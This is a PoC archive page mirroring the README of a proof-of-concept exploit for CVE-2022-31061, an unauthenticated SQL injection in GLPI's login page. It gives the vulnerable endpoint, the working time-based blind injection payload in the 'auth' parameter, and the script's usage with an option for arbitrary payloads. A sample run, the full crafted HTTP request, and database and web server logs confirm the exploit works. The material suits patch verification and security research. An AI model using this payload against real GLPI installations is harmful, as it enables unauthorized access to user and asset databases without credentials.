Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-31061 PoC — SQL injection on login page in GLPI

Source
https://github.com/Wangyanan131/CVE-2022-31061
Associated Vulnerability
Title:SQL injection on login page in GLPI (CVE-2022-31061)
Description:GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. In affected versions there is a SQL injection vulnerability which is possible on login page. No user credentials are required to exploit this vulnerability. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue.
Description
PoC for GLPI CVE-2022-31061
Readme
# CVE-2022-31061
PoC for GLPI CVE-2022-31061

A Proof of Concept for GLPI >= 9.3.0 and < 10.0.2 - Unauthenticated SQL injection on login page

## Legal disclaimer : 
Use of this script for attacking à target without mutual consent is illegal. 
It's is the end user responsibility to obey all applicables laws for his location
Developers assume no lisibility and are not responsible for any misuse or domage caused by this program

## Context :
Public disclosure : https://github.com/glpi-project/glpi/security/advisories/GHSA-w2gc-v2gm-q7wq on 2022-06-28

Patch : https://github.com/glpi-project/glpi/releases/tag/10.0.2 on 2022-06-28

Commit : https://github.com/glpi-project/glpi/commit/21ae07d00d0b3230f6235386e98388cfc5bb0514

## Vulnerability : 
- page : POST /front/login.php
- parameter : &auth=ldap-1%27+UNION+SELECT+SLEEP%285%29+%23+
- injection : Blind Time based injection

##Usage 
```
Usage: CVE-2022-31061.py -t https://example.com [-v] [-c cmd]

Options:
  -h, --help            show this help message and exit
  -t TARGET, --target=TARGET
                        GLPI Website to audit
  -v, --verbose         Display verbose output
  -c CMD, --cmd=CMD     payload to inject. Time based Bind Injection. Context
                        : ' SELECT `id` FROM `glpi_users` WHERE `name` =
                        'fzrfdse' AND `authtype` = '3' AND `auths_id` = '1'
                        [payload] # '
  -u USERAGENT, --user-agent=USERAGENT
                        user-agent to use
  -p PROXY, --proxy=PROXY
                        proxy to use
```

## Example :
Command :
```
$ python CVE-2022-31061.py -t http://target
[ 2022-08-07 14:47:35.911449 ] Begin send request for  UNION SELECT SLEEP(5)
[ 2022-08-07 14:47:54.533460 ] End send request for  UNION SELECT SLEEP(5)  Duration :  18.619755
SUCCESS : target is vulnerable
```

Request :
```
POST /front/login.php HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Referer: http://target/index.php
Cookie: glpi_3f946f74140a3178722cb675d5bf6b47=921opoti2tp4uk3g35sgor5had
Content-Length: 243
Content-Type: application/x-www-form-urlencoded

noAuto=0&redirect=&_glpi_csrf_token=b029a0270351f75ba69cced0385bd77deb548ec0db25eec2c511ee9064ec6bd6&fielda62f008c7f1837=FWVJDCDC&fieldb62f008c7f1838=U6XGS34JKQPC1LD6&auth=ldap-1%27+UNION+SELECT+SLEEP%285%29+%23+&fieldc62f008c7f1839=on&submit=
```

MySQL Logs :
```
SELECT `id` FROM `glpi_users` WHERE `name` = 'FWVJDCDC' AND `authtype` = '3' AND `auths_id` = '1' UNION SELECT SLEEP(5) # '
```

Nginx logs :
```
tester - - [07/Aug/2022:20:47:35 +0200] "GET /index.php HTTP/1.1" 200 3173 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0"
tester - - [07/Aug/2022:20:47:54 +0200] "POST /front/login.php HTTP/1.1" 200 9232 "http://target/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0"
```
File Snapshot

 [4.0K]  /data/pocs/6f8224c271e0e8eab9576cf32826c93083a30348
├── [6.6K]  CVE-2022-31061.py
├── [1.0K]  LICENSE
└── [2.9K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →